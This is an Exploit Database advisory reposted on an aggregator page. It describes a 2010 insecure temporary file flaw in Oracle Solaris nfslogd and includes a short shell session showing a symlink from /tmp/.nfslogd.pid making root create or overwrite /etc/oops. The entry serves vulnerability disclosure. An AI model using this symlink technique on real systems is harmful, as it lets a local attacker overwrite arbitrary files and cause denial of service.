Oracle Solaris – ‘nfslogd’ Insecure Temporary File Creation

Exploit Database
11 阅读

作者： Frank Stuart

日期： 2010-07-13
类别：
- local
平台：
- solaris
来源：https://www.exploit-db.com/exploits/34313/

source: https://www.securityfocus.com/bid/41637/info

Oracle Solaris is prone to an insecure temporary file creation vulnerability.

A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.

This vulnerability affects the following supported versions:
8, 9, 10, OpenSolaris 

nnDon't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid
-> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
-rw------- 1 root root 4 Dec 29 21:25 /etc/oops

last Exploits
Oracle Solaris – ‘nfslogd’ Insecure Temporary File Creation的更多信息

PrusaSlicer 2.6.1 – Arbitrary code execution：
No-IP Dynamic Update Client (DUC) 2.1.9 – Local IP Address Stack Overflow：
Disk Sorter Server 13.6.12 – ‘Disk Sorter Server’ Unquoted Service Path：
Microsoft Windows Live Email – ‘dwmapi.dll’ DLL Hijacking：
BlazeVideo HDTV Player 6.6 Professional – Local Overflow (SEH + ASLR + DEP Bypass)：
DameWare Remote Support 12.0.0.509 – ‘Host’ Buffer Overflow (SEH)：
SAPSetup Automatic Workstation Update Service 750 – ‘NWSAPAutoWorkstationUpdateSvc’ Unquoted Service Path：
GNU wget – Cookie Injection：